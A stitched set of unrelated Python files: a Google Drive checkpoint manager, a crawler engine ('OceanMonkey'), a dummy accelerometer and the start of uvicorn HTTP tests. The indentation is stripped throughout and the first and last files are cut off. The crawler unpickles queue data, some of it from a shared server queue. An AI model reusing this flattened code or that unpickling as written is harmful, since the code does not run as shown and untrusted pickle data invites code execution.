def __init__(self, project_name,
personal_dfolder="1XsSo6zR8bRlDfy7n40NirKNNBdxVh5nE", # your folder the code can read and write to it using your own credentials
base_download_dfolder="1B82anWV8Mb4iHYmOp9tIR9aOTlfllwsD", # my folder..the code have read access to it(public)..don't change this <<<
cred_dir='./utils'
):
# ----------------------------------------------------------------------------------------
# Authenticate and create the PyDrive client.
# This only needs to be done once per notebook.
gauth = GoogleAuth()
self.cred_files = sorted(glob.glob(os.path.join(cred_dir, "cred*")))
gauth.LoadCredentialsFile(self.cred_files[0]) # we need this
print("Using {} as the main credentials file".format(self.cred_files[0]))
self.drive = GoogleDrive(gauth)
self.base_projects_dfolder = base_download_dfolder # this contains my experiments
self.personal_dfolder = personal_dfolder # make your own projects folder
self.project_name = project_name
self.project_id = self.make_sure_project()
self.cred_dir = cred_dir
print("Total Available space from my drive", self.available_space())
def get_projects_list(self, base_folder):
return self.drive.ListFile({'q': 'trashed=false and "{}" in parents and mimeType = "application/vnd.google-apps.folder"'.format(base_folder)}).GetList()
def is_project_exists(self, project_name):
komy_projects_list = self.get_projects_list(self.base_projects_dfolder)
my_projects_list = self.get_projects_list(self.personal_dfolder)
return {"owned by komy": len(list(file for file in komy_projects_list if file["title"] == project_name)) > 0,
"owned by me": len(list(file for file in my_projects_list if file["title"] == project_name)) > 0,
}
def make_sure_project(self):
if not self.is_project_exists(self.project_name)["owned by me"]:
print("Creating new project:", self.project_name)
folder_metadata = {'title': self.project_name, 'mimeType': 'application/vnd.google-apps.folder', "parents": [{"kind": "self.drive#fileLink", "id": self.personal_dfolder}]}
folder = self.drive.CreateFile(folder_metadata)
folder.Upload()
time.sleep(10) # make sure it's created
komy_projects_list = self.get_projects_list(self.base_projects_dfolder)
is_new_to_komy = len(list(file for file in komy_projects_list if file["title"] == self.project_name)) == 0
my_projects_list = self.get_projects_list(self.personal_dfolder)
return {"owned by komy": None if is_new_to_komy else list(file for file in komy_projects_list if file["title"] == self.project_name)[0]['id'],
"owned by me": list(file for file in my_projects_list if file["title"] == self.project_name)[0]['id'],
}
def available_space(self):
return sum(map(lambda item: 15 - item[1], self.used_per_account()))
def used_per_account(self):
used_space = []
for chosen_cred in self.cred_files:
gauth = GoogleAuth()
gauth.LoadCredentialsFile(chosen_cred)
drive = GoogleDrive(gauth)
total = 0
for i in drive.ListFile({'q': "mimeType != 'application/vnd.google-apps.folder' and 'me' in owners"}).GetList():
if "fileSize" in i.keys():
total += int(i["fileSize"])
total /= 1024 ** 3
used_space.append((chosen_cred, total))
return sorted(used_space, key=lambda item: item[1])
def search_file(self, file_name):
return self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(file_name, self.project_id["owned by me"])}).GetList() + \
self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(file_name, self.project_id["owned by komy"])}).GetList()
def search_folder(self, folder_name):
return self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(folder_name, self.project_id["owned by me"])}).GetList() + \
self.drive.ListFile({'q': "title='{}' and trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(folder_name, self.project_id["owned by komy"])}).GetList()
def _upload_file(self, file_path):
chosen_cred, _ = self.used_per_account()[0]
gauth = GoogleAuth()
gauth.LoadCredentialsFile(chosen_cred)
self.drive = GoogleDrive(gauth)
upload_started = time.time()
title = os.path.split(file_path)[-1]
uploaded = self.drive.CreateFile({'title': title, "parents": [{"kind": "drive#fileLink", "id": self.project_id["owned by me"]}]})
uploaded.SetContentFile(file_path) # file on disk
uploaded.Upload()
print("cred file", chosen_cred)
self.log_upload_drive(uploaded.get('id'), title, upload_started)
def upload_project_files(self, files_list, snapshot_name, dir_list=None):
"""
Compresses list of files/dirs and upload them asynchronously to drive as .zip
"""
if dir_list is None:
dir_list = []
snapshot_name += ".zip"
def upload_job():
"""
uploads single zip file containing checkpoint/logs
"""
snapshot_zip = ZipFile(snapshot_name)
for file in files_list:
snapshot_zip.add_file(file)
for dir in dir_list:
snapshot_zip.add_directory(dir)
snapshot_zip.print_info()
snapshot_zip.zipf.close() # now i can upload
self._upload_file(snapshot_name)
try:
for dir in dir_list:
shutil.rmtree(dir)
except:
pass
upload_thread = threading.Thread(target=upload_job)
upload_thread.start()
def upload_project_file(self, file_path):
"""
upload a file asynchronously to drive
"""
upload_thread = threading.Thread(target=lambda: self._upload_file(file_path))
upload_thread.start()
def download_file(self, file_id, save_path, unzip=True, replace=True):
download_started = time.time()
# gauth = GoogleAuth()
# gauth.LoadCredentialsFile(self.cred_file_base.format(random.randint(self.start, self.end)))
# self.drive = GoogleDrive(gauth)1djGzpxAYFvNX-UaQ7ONqDHGgnzc8clBK
downloaded = self.drive.CreateFile({'id': file_id})
if not replace:
if os.path.isfile(save_path):
local_files = glob.glob(save_path + ".*")
if local_files:
last = int(sorted(
glob.glob(save_path + ".*"), key=lambda path: int(path.split(".")[-1])
)[-1].split(".")[-1])
save_path += "." + str(last + 1)
else:
save_path += ".1"
downloaded.GetContentFile(save_path) # Download file and save locally
if unzip:
zip_ref = zipfile.ZipFile(save_path, 'r')
zip_ref.extractall('.')
zip_ref.close()
self.log_download_drive(downloaded['id'], downloaded['title'], save_path, download_started)
return save_path
def download_project_files(self, unzip=False, replace=True):
my_project_files = self.list_project_files_owned_by_me()
if my_project_files:
project_files = my_project_files
else:
project_files = self.list_project_files_owned_by_komy()
self.download_files_list(project_files, unzip, replace)
def download_files_list(self, project_files, unzip, replace):
id_name_list = []
for project_file in project_files:
id_name_list.append((project_file["id"], project_file["title"]))
for file_id, file_path in id_name_list:
self.download_file(file_id, file_path, unzip, replace)
def list_project_files_owned_by_komy(self):
if self.project_id["owned by komy"] is None:
return []
return self.drive.ListFile({'q': "trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(self.project_id["owned by komy"])}).GetList()
def list_project_files_owned_by_me(self):
return self.drive.ListFile({'q': "trashed=false and mimeType != 'application/vnd.google-apps.folder' and '{}' in parents".format(self.project_id["owned by me"])}).GetList()
def list_project_files_owned_by_this_cred_file(self, drive):
return drive.ListFile({'q': "mimeType != 'application/vnd.google-apps.folder' and '{}' in parents and 'me' in owners".format(self.project_id["owned by me"])}).GetList()
def delete_project_files(self):
for chosen_cred in self.cred_files:
gauth = GoogleAuth()
gauth.LoadCredentialsFile(chosen_cred)
drive = GoogleDrive(gauth)
for project_file in self.list_project_files_owned_by_this_cred_file(drive):
project_file.Delete()
print(project_file["title"], "deleted")
project_folder = self.drive.CreateFile({'id': self.project_id["owned by me"]})
project_folder.Delete()
def list_projects(self):
return {"owned by komy": self.drive.ListFile({'q': "trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(self.base_projects_dfolder)}).GetList(),
"owned by me": self.drive.ListFile({'q': "trashed=false and mimeType = 'application/vnd.google-apps.folder' and '{}' in parents".format(self.personal_dfolder)}).GetList(),
}
def get_latest_snapshot_meta(self):
if len(self.list_project_files_owned_by_me()) > 0:
return True, self.list_project_files_owned_by_me()[0]['title'], self.list_project_files_owned_by_me()[0]['id']
elif len(self.list_project_files_owned_by_komy()) > 0:
return True, self.list_project_files_owned_by_komy()[0]['title'], self.list_project_files_owned_by_komy()[0]['id']
else:
return False, None, None
def get_latest_snapshot(self):
if_possible, save_path, file_id = self.get_latest_snapshot_meta()
if if_possible:
save_path = self.download_file(file_id, save_path)
return if_possible, save_path
def time_taken(self, start, end):
hours, rem = divmod(end - start, 3600)
minutes, seconds = divmod(rem, 60)
return int(hours), int(minutes), int(seconds)
def log_download_drive(self, _id, title, saved_as, download_start_time):
hours, minutes, seconds = self.time_taken(download_start_time, time.time())
print("Took {:0>2}:{:0>2}:{:0>2} to ".format(hours, minutes, seconds), end="")
print('Download and unzipped file with ID:{}, titled:{}, saved as:{}'.format(_id, title, saved_as))
print("*" * 100)
def log_upload_drive(self, _id, title, upload_start_time):
hours, minutes, seconds = self.time_taken(upload_start_time, time.time())
print("Took {:0>2}:{:0>2}:{:0>2} to ".format(hours, minutes, seconds), end="")
print('Upload file with ID:{}, titled:{}'.format(_id, title))
print("*" * 100)
if __name__ == '__main__':
# "mot-xception-adam-5e-05-imnet"
# "mot-xception-adam-5e-06-imnet"
# "spa-xception-adam-5e-06-imnet"
# spa-xception-adam-5e-05-imnet
print(sorted(glob.glob("utils/cred*")))
for project in ["heavy-spa-xception-adam-1e-05-imnet"]:
drive_manager = DriveManager(project, cred_dir="utils") # , "credentials{}.txt"
print(drive_manager.list_projects())
continue
# drive_manager.upload_file("150-0.86043-0.85858.zip")
# drive_manager.upload_file("155-0.86043-0.85937.zip")
# for i in drive_manager.list_projects():
# print(
# i['title']
# )
# drive_manager.download_project_files(unzip=False)
pprint.pprint(drive_manager.used_per_account())
print(
drive_manager.available_space()
)
# drive_manager.delete_project_files()
print(
drive_manager.available_space()
)
print(
drive_manager.list_project_files_owned_by_komy())
print(
drive_manager.list_project_files_owned_by_me()
)
print(
drive_manager.list_project_files_owned_by_this_cred_file(drive_manager.drive)
)
|
engine.py | """
This is the OceanMonkey engine which controls all the monkeys to crawling data
"""
import time
import importlib
import multiprocessing
import copy
import pickle
import threading
import asyncio
from threading import Lock, Condition
from oceanmonkey.core.monkey import MonkeyType
from oceanmonkey.core.request import Request
from oceanmonkey.core.response import Response
from oceanmonkey.utils.settings.filters import FilterType
from oceanmonkey.utils.settings.time import TimeType
from oceanmonkey.utils.settings import SettingsType
from oceanmonkey.utils.settings import SimpleSettingsFactory
from oceanmonkey.core.queue import SimpleQueueFactory
from oceanmonkey.core.queue import QueueType
from oceanmonkey.core.signal import SignalValue, Signal
from oceanmonkey.utils import current_frame
from oceanmonkey.utils.url import domain
from oceanmonkey.utils import queues as Queues
from oceanmonkey.utils.log import logger
from oceanmonkey.utils import bye
class OceanMonkey:
__instance = None
LOCAL = 0
CLUSTER = 1
def __new__(cls, *args, **kwargs):
if not cls.__instance:
cls.__instance = super().__new__(cls)
return cls.__instance
def __init__(self, settings_path=None):
self.__monkeys = {
MonkeyType.MACAQUE: self._consume_seeds,
MonkeyType.GIBBON: self._consume_sources,
}
self.__settings_path = settings_path
self.__settings = importlib.import_module(settings_path)
self.__seed_queues = []
self.__source_queues = []
self.__macaque_monkeys = []
self.__gibbon_monkeys = []
self.__monkey_queues = {}
self.__seeds_lock = Lock()
self.__source_lock = Lock()
@property
def settings(self):
return self.__settings
@staticmethod
def _receive_a_goodbye_signal(value):
goodbye = False
try:
may_be_signal = pickle.loads(value)
if isinstance(may_be_signal, (Signal,)) and may_be_signal.value == SignalValue.SAY_GOODBYE:
goodbye = True
except (KeyError,):
pass
return goodbye
@staticmethod
def _is_alive(monkeys):
is_alive = False
for monkey in monkeys:
if monkey.is_alive():
is_alive = True
break
return is_alive
@staticmethod
def _produce_seeds(settings_path, seeds_queue, macaque_queues, monkeys, seeds_lock):
settings = importlib.import_module(settings_path)
settings_factory = SimpleSettingsFactory(settings)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
seeds_settings = settings_factory.get(SettingsType.SEEDS)
seeds_key = seeds_settings.get()
macaques = monkey_settings.has(MonkeyType.MACAQUE)
time_settings = settings_factory.get(SettingsType.TIME)
max_idle_time = time_settings.get()
while True:
logger.info("Getting seed from seeds queue:{}".format(seeds_queue.info()))
value, timeout = seeds_queue.get(keys=seeds_key, timeout=max_idle_time)
if timeout:
logger.info("Macaque for seeds closed because of timeout")
break
if not OceanMonkey._is_alive(monkeys):
seeds_queue.put(value)
logger.info("Macaque for seeds closed because of there are no monkeys")
break
if OceanMonkey._receive_a_goodbye_signal(value):
logger.info("Macaque for seeds closed because of receiving the goodbye's signal")
break
logger.info("Seed produced from seeds queue:{}".format(seeds_queue.info()))
seeds_lock.acquire() if macaques > 1 else None
"""
choose the backend's monkey with round robin.
the first element of monkey_queues indicates the backend monkey queues' index
e.g.: [1, queue, queue,...]
"""
macaque_queue = Queues.next_queue(macaque_queues)
seeds_lock.release() if macaques > 1 else None
macaque_queue.put(value) if macaque_queue else bye.bye("You must configure at least one macaque",
fn=__name__, lno=current_frame().f_lineno)
logger.info("Transfer seed to macaque monkey".format(value))
@staticmethod
def _produce_source(settings_path, source_queue, gibbon_queues, monkeys, source_lock):
settings = importlib.import_module(settings_path)
settings_factory = SimpleSettingsFactory(settings)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
source_settings = settings_factory.get(SettingsType.SOURCE)
source_key = source_settings.get()
gibbons = monkey_settings.has(MonkeyType.GIBBON)
time_settings = settings_factory.get(SettingsType.TIME)
max_idle_time = time_settings.get()
while True:
logger.info("Getting source from source queue:{}".format(source_queue.info()))
value, timeout = source_queue.get(keys=source_key, timeout=max_idle_time)
if timeout:
logger.info("Gibbon for source closed because of timeout")
break
if not OceanMonkey._is_alive(monkeys):
source_queue.put(value)
logger.info("Gibbon for source closed because of there are no monkeys")
break
if OceanMonkey._receive_a_goodbye_signal(value):
logger.info("Gibbon for source closed because of receiving the goodbye's signal")
break
logger.info("Source produced from source queue:{}".format(source_queue.info()))
source_lock.acquire() if gibbons > 1 else None
"""
choose the backend's monkey with round robin.
the first element of monkey_queues indicates the backend monkey queues' index
e.g.: [1, queue, queue, ...]
"""
gibbon_queue = Queues.next_queue(gibbon_queues)
source_lock.release() if gibbons > 1 else None
gibbon_queue.put(value) if gibbon_queue else bye.bye("You must configure at least one gibbon",
fn=__name__, lno=current_frame().f_lineno)
logger.info("Produce page source to gibbon monkey")
@staticmethod
def _consume_seeds(settings_path, macaque_queue, gibbon_queues):
settings = importlib.import_module(settings_path)
seeds = []
seeds_waiter = Condition(Lock())
seed_queues = SimpleQueueFactory.get_queues(settings, QueueType.SEEDS)
source_queues = SimpleQueueFactory.get_queues(settings, QueueType.SOURCE)
settings_factory = SimpleSettingsFactory(settings)
concurrency_settings = settings_factory.get(SettingsType.CONCURRENCY)
deploy_settings = settings_factory.get(SettingsType.DEPLOY)
filter_settings = settings_factory.get(SettingsType.FILTERS)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
headers_settings = settings_factory.get(SettingsType.HEADERS)
middleware_settings = settings_factory.get(SettingsType.MIDDLEWARE)
seeds_settings = settings_factory.get(SettingsType.SEEDS)
source_settings = settings_factory.get(SettingsType.SOURCE)
time_settings = settings_factory.get(SettingsType.TIME)
has_gibbon = monkey_settings.has(MonkeyType.GIBBON)
has_macaque = monkey_settings.has(MonkeyType.MACAQUE)
request_dup_filter = filter_settings.get(FilterType.REQUEST_FILTER)
source_dup_filter = filter_settings.get(FilterType.SOURCE_FILTER)
max_idle_time = time_settings.get()
crawling_delay = time_settings.get(TimeType.DELAY)
seeds_key = seeds_settings.get()
source_key = source_settings.get()
queue_timeout, max_seeds_size, max_buffer_time = concurrency_settings.get()
download_middlewares = middleware_settings.get(MonkeyType.MACAQUE)
deploy_mode = deploy_settings.get()
gibbons = monkey_settings.get(MonkeyType.GIBBON)
orangutans = monkey_settings.get(MonkeyType.ORANGUTAN)
[orangutan.when_wake_up() for orangutan in orangutans]
logger.info("MACAQUE's domain: All Orangutans woke up, waiting for processing page source's items") \
if len(orangutans) > 0 else None
async def __gather(requests):
__results = await asyncio.gather(*requests)
return [Response(url=result[0], page_source=result[1], status_code=result[2]) for result in __results]
def __prepare(requests):
for request in requests:
__headers = headers_settings.get()
request.add_headers(__headers) if __headers else None
for download_middleware in download_middlewares:
for request in requests:
if hasattr(download_middleware, "prepare"):
download_middleware.prepare(request)
def __do_request(requests):
__responses = []
for download_middleware in download_middlewares:
if not hasattr(download_middleware, "on_request"):
continue
for request in requests:
time.sleep(crawling_delay) if crawling_delay > 0 else None
if hasattr(download_middleware, "on_request"):
__response = download_middleware.on_request(request)
if not isinstance(__response, Response):
logger.warning("The download middleware must provide "
"the on_request method and return a Response object")
break
__responses.append(__response)
break
if not __responses:
__async_requests = []
for request in requests:
time.sleep(crawling_delay) if crawling_delay > 0 else None
__async_requests.append(request.do_request())
__responses = asyncio.run(__gather(__async_requests)) if len(__async_requests) > 0 else []
return __responses
def __on_request_finished(responses):
for download_middleware in download_middlewares:
for response in responses:
if hasattr(download_middleware, "on_finish"):
download_middleware.on_finish(response)
def __transfer(values):
__serve_forever = True
for value in values:
if isinstance(value, (Request,)):
if deploy_mode == OceanMonkey.LOCAL:
if value.refuse_filter or not request_dup_filter.seen(value, local=True):
macaque_queue.put(pickle.dumps(value))
elif deploy_mode == OceanMonkey.CLUSTER:
__seed_queue = Queues.next_queue(seed_queues)
if not request_dup_filter.server:
request_dup_filter.server = __seed_queue.server
if value.refuse_filter or not request_dup_filter.seen(value):
__seed_queue.put(pickle.dumps(value), keys=seeds_key)
elif isinstance(value, (Signal, )):
macaque_queue.put(pickle.dumps(value))
else:
[orangutan.process_item(value) for orangutan in orangutans]
return __serve_forever
def __schedule(requests):
__responses = __do_request(requests)
__on_request_finished(__responses)
for index, response in enumerate(__responses):
__responses[index].meta = requests[index].meta
__responses[index].callback = requests[index].callback
if deploy_mode == OceanMonkey.LOCAL:
if has_gibbon:
for response in __responses:
if source_dup_filter.seen(response, local=True):
response.repeated = True
logger.info("Ocean Monkey work in local mode and there is gibbon, "
"just transfer response to gibbon queue")
gibbon_queue = Queues.next_queue(gibbon_queues)
gibbon_queue.put(pickle.dumps(response.get_init_args())) if gibbon_queue \
else bye.bye("You must configure at least one gibbon",
fn=__name__, lno=current_frame().f_lineno)
elif has_macaque:
for __response in __responses:
if source_dup_filter.seen(__response, local=True):
__response.repeated = True
logger.info("Ocean Monkey work in local mode and there is only macaque,"
"just play the role of gibbon")
if not __response.callback:
__response_coroutine = None
for gibbon in gibbons:
if hasattr(gibbon, "allowed_domains"):
if domain(__response.url) in gibbon.allowed_domains:
__response_coroutine = gibbon.parse(__response)
else:
__response_coroutine = gibbon.parse(__response)
results = [result for result in __response_coroutine] if __response_coroutine else []
__transfer(results)
else:
__response_coroutine = __response.parse(__response)
__results = [result for result in __response_coroutine]
__transfer(__results)
elif deploy_mode == OceanMonkey.CLUSTER:
if has_gibbon:
for __response in __responses:
__source_queue = Queues.next_queue(source_queues)
if not source_dup_filter.server:
source_dup_filter.server = __source_queue.server
if source_dup_filter.seen(__response):
__response.repeated = True
logger.info("Ocean Monkey work in cluster mode and there is gibbon,"
"just transfer response to gibbon queue")
__include_page_source = True if not __response.repeated else False
__gibbon_queue = Queues.next_queue(gibbon_queues)
__gibbon_queue.put(pickle.dumps(__response.get_init_args(
include_page_source=__include_page_source))) if __gibbon_queue else \
bye.bye("You must configure at least one gibbon", fn=__name__, lno=current_frame().f_lineno)
else:
for __response in __responses:
__source_queue = Queues.next_queue(source_queues)
if not source_dup_filter.server:
source_dup_filter.server = __source_queue.server
if source_dup_filter.seen(__response):
__response.repeated = True
logger.info("Ocean Monkey work in cluster mode and there is only macaque,"
"just transfer response to server's source queue")
__include_page_source = True if not __response.repeated else False
__source_queue.put(pickle.dumps(__response.get_init_args(
include_page_source=__include_page_source)), keys=source_key)
def __consume():
__serve_forever = True
idle_time = 0
while __serve_forever:
seeds_waiter.acquire()
try:
__value = macaque_queue.get(timeout=queue_timeout)
idle_time = 0
except(Exception, ):
idle_time += queue_timeout
if max_idle_time is not None and idle_time >= max_idle_time:
say_goodbye_signal = pickle.dumps(Signal(SignalValue.TOO_IDLE))
seeds.append(say_goodbye_signal)
logger.info("Macaque was fired for being too idle")
seeds_waiter.notify()
seeds_waiter.release()
break
seeds_waiter.release()
continue
seeds.append(__value)
if len(seeds) >= max_seeds_size:
seeds_waiter.notify()
seeds_waiter.release()
def __batch_download():
__serve_forever = True
__excluding_domains_cache = {None, }
while __serve_forever:
seeds_waiter.acquire()
if len(seeds) < max_seeds_size:
seeds_waiter.wait(timeout=max_buffer_time)
__seeds_copy = copy.deepcopy(seeds) if seeds else []
seeds.clear() if seeds else None
seeds_waiter.release()
__http_requests = []
for __value in __seeds_copy:
try:
__value = pickle.loads(__value)
if isinstance(__value, (Request, )):
__http_requests.append(__value) if domain(__value.url) not in __excluding_domains_cache else None
elif isinstance(__value, (Signal, )):
if __value.value == SignalValue.SAY_GOODBYE:
__excluding_domains_cache.add(domain(__value.url))
elif __value.value == SignalValue.TOO_IDLE:
__serve_forever = False
break
except (KeyError,):
__url = __value.decode() if isinstance(__value, bytes) else None
__http_requests.append(Request(url=__url)) if domain(__url) not in __excluding_domains_cache else None
__prepare(__http_requests)
__schedule(__http_requests)
_threads = [threading.Thread(target=__consume), threading.Thread(target=__batch_download)]
[_thread.start() for _thread in _threads]
[_thread.join() for _thread in _threads]
[orangutan.when_sleep() for orangutan in orangutans]
@staticmethod
def _consume_sources(settings_path, gibbon_queue, macaque_queues):
settings = importlib.import_module(settings_path)
serve_forever = True
seed_queues = SimpleQueueFactory.get_queues(settings, QueueType.SEEDS)
settings_factory = SimpleSettingsFactory(settings)
deploy_settings = settings_factory.get(SettingsType.DEPLOY)
filter_settings = settings_factory.get(SettingsType.FILTERS)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
seeds_settings = settings_factory.get(SettingsType.SEEDS)
time_settings = settings_factory.get(SettingsType.TIME)
max_idle_time = time_settings.get()
deploy_mode = deploy_settings.get()
request_dup_filter = filter_settings.get(FilterType.REQUEST_FILTER)
gibbons = monkey_settings.get(MonkeyType.GIBBON)
orangutans = monkey_settings.get(MonkeyType.ORANGUTAN)
[orangutan.when_wake_up() for orangutan in orangutans]
logger.info("GIBBON's domain: All Orangutans woke up, waiting for processing page source's items") \
if len(orangutans) > 0 else None
def __schedule(values):
for value in values:
if isinstance(value, (Request,)):
if deploy_mode == OceanMonkey.LOCAL:
if value.refuse_filter or not request_dup_filter.seen(value, local=True):
__macaque_queue = Queues.next_queue(macaque_queues)
logger.info("Transfer Request <{}> to Macaque queue".format(value.url))
__macaque_queue.put(pickle.dumps(value)) if __macaque_queue else None
elif deploy_mode == OceanMonkey.CLUSTER:
__seed_queue = Queues.next_queue(seed_queues)
if not request_dup_filter.server:
request_dup_filter.server = __seed_queue.server
if value.refuse_filter or not request_dup_filter.seen(value):
__seed_queue.put(pickle.dumps(value), keys=seeds_settings.get())
elif isinstance(value, (Signal, )):
if value.value == SignalValue.SAY_GOODBYE:
logger.info("Gibbon receive a say-goodbye's signal on <{}>".format(value.url))
# __serve_forever = False
say_goodbye_signal = pickle.dumps(Signal(SignalValue.SAY_GOODBYE, value.url))
for macaque_queue in Queues.all_queues(macaque_queues):
macaque_queue.put(say_goodbye_signal)
# break
else:
[orangutan.process_item(value) for orangutan in orangutans]
while serve_forever:
logger.info("Getting source from server's source queue or macaque...")
try:
_init_args = pickle.loads(gibbon_queue.get(timeout=max_idle_time))
except (Exception, ):
logger.info("Gibbon was fired for being too idle")
serve_forever = False
continue
_response = Response(**_init_args)
for gibbon in gibbons:
if hasattr(gibbon, "allowed_domains"):
if domain(_response.url) not in gibbon.allowed_domains:
continue
if not _response.callback:
results = gibbon.parse(_response)
else:
results = _response.parse(_response)
__schedule(results) if results else None
[orangutan.when_sleep() for orangutan in orangutans]
def _init_monkey_queues(self):
if not hasattr(self.settings, "MONKEYS"):
bye.bye("You must configure the monkeys in settings.py", fn=__name__, lno=current_frame().f_lineno)
for monkey_type, monkeys in getattr(self.settings, "MONKEYS").items():
if monkey_type not in self.__monkey_queues:
self.__monkey_queues[monkey_type] = [1]
for _ in range(monkeys):
queue = multiprocessing.Queue()
self.__monkey_queues[monkey_type].append(queue)
def __get_monkey_queues(self, monkey_type):
return self.__monkey_queues[monkey_type] if monkey_type in self.__monkey_queues else []
def _launch_monkeys(self):
macaque_queues = self.__get_monkey_queues(MonkeyType.MACAQUE)
gibbon_queues = self.__get_monkey_queues(MonkeyType.GIBBON)
def _launch_macaque_monkeys():
for queue in macaque_queues[1:]:
macaque = multiprocessing.Process(
target=self.__monkeys[MonkeyType.MACAQUE],
args=(self.__settings_path, queue, gibbon_queues))
macaque.start()
self.__macaque_monkeys.append(macaque)
def _launch_gibbon_monkeys():
for queue in gibbon_queues[1:]:
gibbon = multiprocessing.Process(
target=self.__monkeys[MonkeyType.GIBBON],
args=(self.__settings_path, queue, macaque_queues))
gibbon.start()
self.__gibbon_monkeys.append(gibbon)
_launch_macaque_monkeys()
_launch_gibbon_monkeys()
def _wait_for_monkeys(self):
[monkey.join() for monkey in self.__macaque_monkeys]
[monkey.join() for monkey in self.__gibbon_monkeys]
def _init_seed_and_source_queues(self):
self.__seed_queues = SimpleQueueFactory.get_queues(self.settings, QueueType.SEEDS)
self.__source_queues = SimpleQueueFactory.get_queues(self.settings, QueueType.SOURCE)
if not self.__seed_queues and not self.__source_queues:
bye.bye("You must configure the seeds queue or source queue", fn=__name__, lno=current_frame().f_lineno)
def _init_seed_workers(self):
self.__seed_workers = []
settings_factory = SimpleSettingsFactory(self.settings)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
queue_settings = settings_factory.get(SettingsType.QUEUE)
if monkey_settings.has(MonkeyType.MACAQUE) and queue_settings.has(QueueType.SEEDS):
for seed_queue in self.__seed_queues[1:]:
thread = threading.Thread(target=self._produce_seeds,
args=(self.__settings_path, seed_queue,
self.__monkey_queues[MonkeyType.MACAQUE],
self.__macaque_monkeys, self.__seeds_lock))
self.__seed_workers.append(thread)
def _init_source_workers(self):
self.__source_workers = []
settings_factory = SimpleSettingsFactory(self.settings)
monkey_settings = settings_factory.get(SettingsType.MONKEY)
queue_settings = settings_factory.get(SettingsType.QUEUE)
if monkey_settings.has(MonkeyType.GIBBON) and queue_settings.has(QueueType.SOURCE):
for source_queue in self.__source_queues[1:]:
thread = threading.Thread(target=self._produce_source,
args=(self.__settings_path, source_queue,
self.__monkey_queues[MonkeyType.GIBBON],
self.__gibbon_monkeys, self.__source_lock))
self.__source_workers.append(thread)
def _launch_workers_and_wait(self):
all_workers = self.__seed_workers + self.__source_workers
[worker.start() for worker in all_workers]
[worker.join() for worker in all_workers]
def serve_forever(self):
self._init_seed_and_source_queues()
self._init_monkey_queues()
self._launch_monkeys()
self._init_seed_workers()
self._init_source_workers()
self._launch_workers_and_wait()
|
accelerometer.py | '''
'Windows' accelerometer
---------------------
A dummy accelerometer for phone emulation
'''
from plyer.facades import Accelerometer
from sensor_simulate import SemiRandomData
# from multiprocessing import Process, Manager
from threading import Thread
import time
import sys
class AccelerometerSensorListener(object):
def __init__(self):
self.sensor = 'DummySensorObj'
# manager = Manager()
# self.values = manager.list([None, None, None])
self.values = [None, None, None]
# self.state = manager.Value('is_enabled', False)
self.state = False
def enable(self):
# self.state.value = True
self.value = True
# self.process_get_data = Process(target=self.get_data)
self.process_get_data = Thread(target=self.get_data)
self.process_get_data.start()
def disable(self):
# self.state.value = False
self.value = False
def get_data(self):
sps_obj = SemiRandomData(3, 3, 9.8, .02)
# while self.state.value is True:
while self.value is True:
a, b, c = sps_obj.get_value()
self.values[0] = a
self.values[1] = b
self.values[2] = c
time.sleep(.01)
def monitor(self, time_length=10, frequency=1):
for i in range(time_length):
time.sleep(frequency)
sys.stdout.write(str(self.values) + '\n')
sys.stdout.flush()
class WinAccelerometer(Accelerometer):
def __init__(self):
super(WinAccelerometer, self).__init__()
self.bState = False
def _enable(self):
if (not self.bState):
self.listener = AccelerometerSensorListener()
self.listener.enable()
self.bState = True
def _disable(self):
if (self.bState):
self.bState = False
self.listener.disable()
del self.listener
def _get_acceleration(self):
if (self.bState):
return tuple(self.listener.values)
else:
return (None, None, None)
def __del__(self):
if(self.bState):
self._disable()
super(self.__class__, self).__del__()
def instance():
return WinAccelerometer()
|
test_http.py | import asyncio
import contextlib
import logging
import socket
import threading
import time
import pytest
from tests.response import Response
from uvicorn import Server
from uvicorn.config import Config
from uvicorn.main import ServerState
from uvicorn.protocols.http.h11_impl import H11Protocol
try:
from uvicorn.protocols.http.httptools_impl import HttpToolsProtocol
except ImportError: # pragma: nocover
HttpToolsProtocol = None
HTTP_PROTOCOLS = [p for p in [H11Protocol, HttpToolsProtocol] if p is not None]
SIMPLE_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_HEAD_REQUEST = b"\r\n".join([b"HEAD / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
LARGE_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: text/plain",
b"Content-Length: 100000",
b"",
b"x" * 100000,
]
)
START_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b"",
]
)
FINISH_POST_REQUEST = b'{"hello": "world"}'
HTTP10_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.0", b"Host: example.org", b"", b""])
GET_REQUEST_WITH_RAW_PATH = b"\r\n".join(
[b"GET /one%2Ftwo HTTP/1.1", b"Host: example.org", b"", b""]
)
UPGRADE_REQUEST = b"\r\n".join(
[
b"GET / HTTP/1.1",
b"Host: example.org",
b"Connection: upgrade",
b"Upgrade: websocket",
b"Sec-WebSocket-Version: 11",
b"",
b"",
]
)
INVALID_REQUEST_TEMPLATE = b"\r\n".join(
[
b"%s",
b"Host: example.org",
b"",
b"",
]
)
class MockTransport:
def __init__(self, sockname=None, peername=None, sslcontext=False):
self.sockname = ("127.0.0.1", 8000) if sockname is None else sockname
self.peername = ("127.0.0.1", 8001) if peername is None else peername
self.sslcontext = sslcontext
self.closed = False
self.buffer = b""
self.read_paused = False
def get_extra_info(self, key):
return {
"sockname": self.sockname,
